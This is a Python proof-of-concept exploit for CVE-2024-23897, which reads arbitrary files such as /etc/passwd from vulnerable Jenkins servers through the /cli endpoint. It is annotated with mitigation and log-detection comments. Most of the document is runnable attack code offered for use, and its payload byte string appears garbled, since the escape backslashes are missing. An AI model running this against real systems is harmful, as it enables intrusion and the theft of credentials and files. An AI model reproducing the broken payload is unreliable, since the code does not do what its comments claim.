Authored by binganao | Site github.com

Jenkins versions 2.441 and below and LTS 2.426.3 and below remote arbitrary file read proof of concept exploit written in Python.

advisories | CVE-2024-23897

# python poc.py
# [*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]

import threading
import http.client
import time
import uuid
import urllib.parse
import sys

# Exactly two positional arguments are required: the Jenkins base URL and a
# file path; anything else prints the usage line and exits.
# Affected versions per the page header are Jenkins <= 2.441 and LTS <= 2.426.3;
# running a release newer than those is the fix, and restricting the CLI
# endpoint is the usual interim mitigation (confirm against the vendor advisory).
# NOTE(review): `exit()` is the site-module helper; `sys.exit(1)` is the
# conventional form in scripts and would also signal the usage error.
if len(sys.argv) != 3:
    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
    exit()

# Body sent on the "upload" side of the CLI session.  As written on the page it
# is a fixed byte sequence that embeds the CLI command name `help` and the
# user-supplied path from argv[2] prefixed with `@`; it is kept verbatim here.
data_bytes = b'x00x00x00x06x00x00x04helpx00x00x00x0ex00x00x0c@' + sys.argv[2].encode() + b'x00x00x00x05x02x00x03GBKx00x00x00x07x01x00x05zh_CNx00x00x00x00x03'
# Only the network location (host[:port]) of argv[1] is used by req1/req2; the
# URL scheme is ignored because http.client.HTTPConnection always speaks plain
# HTTP, so an https:// target would not work with this script.
target = urllib.parse.urlparse(sys.argv[1])
# One fresh random session id shared by both requests.  From a detection
# standpoint, two near-simultaneous POSTs to /cli?remoting=false that carry the
# same Session header value with Side: download and Side: upload is the
# observable pattern of this script.
uuid_str = str(uuid.uuid4())

# Echo the body that will be sent (debug output only).
print(f'REQ: {data_bytes}n')

def req1():
    """Open the "download" side of the CLI session and print its response.

    Reads ``target`` and ``uuid_str`` from module scope.  Sends a POST to
    ``/cli?remoting=false`` with the shared ``Session`` id and
    ``Side: download``, then reads the whole response body once and prints
    it.  The connection is never closed explicitly.
    """
    conn = http.client.HTTPConnection(target.netloc)
    conn.request("POST", "/cli?remoting=false", headers={
        "Session": uuid_str,
        "Side": "download"
    })
    # Blocks until the server answers; the server's reply is what ends up in
    # the printed RESPONSE line.
    print(f'RESPONSE: {conn.getresponse().read()}')

def req2():
    """Send the "upload" side of the CLI session carrying ``data_bytes``.

    Reads ``target``, ``uuid_str`` and ``data_bytes`` from module scope.  Uses
    the same ``Session`` id as :func:`req1` but ``Side: upload`` and an
    ``application/octet-stream`` body.  The response is never read and the
    connection is never closed; both are left to the garbage collector.
    """
    conn = http.client.HTTPConnection(target.netloc)
    conn.request("POST", "/cli?remoting=false", headers={
        "Session": uuid_str,
        "Side": "upload",
        "Content-type": "application/octet-stream"
    }, body=data_bytes)

# Run both sides concurrently: the download side is started first and the
# upload side 0.1 s later (presumably so the server has registered the session
# before the body arrives — not verified here).  Both threads are joined so the
# script does not exit before req1 has printed its response.  The short,
# fixed gap between the two requests is another indicator a log reviewer can
# use alongside the shared Session header value.
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)

t1.start()
time.sleep(0.1)
t2.start()

t1.join()
t2.join()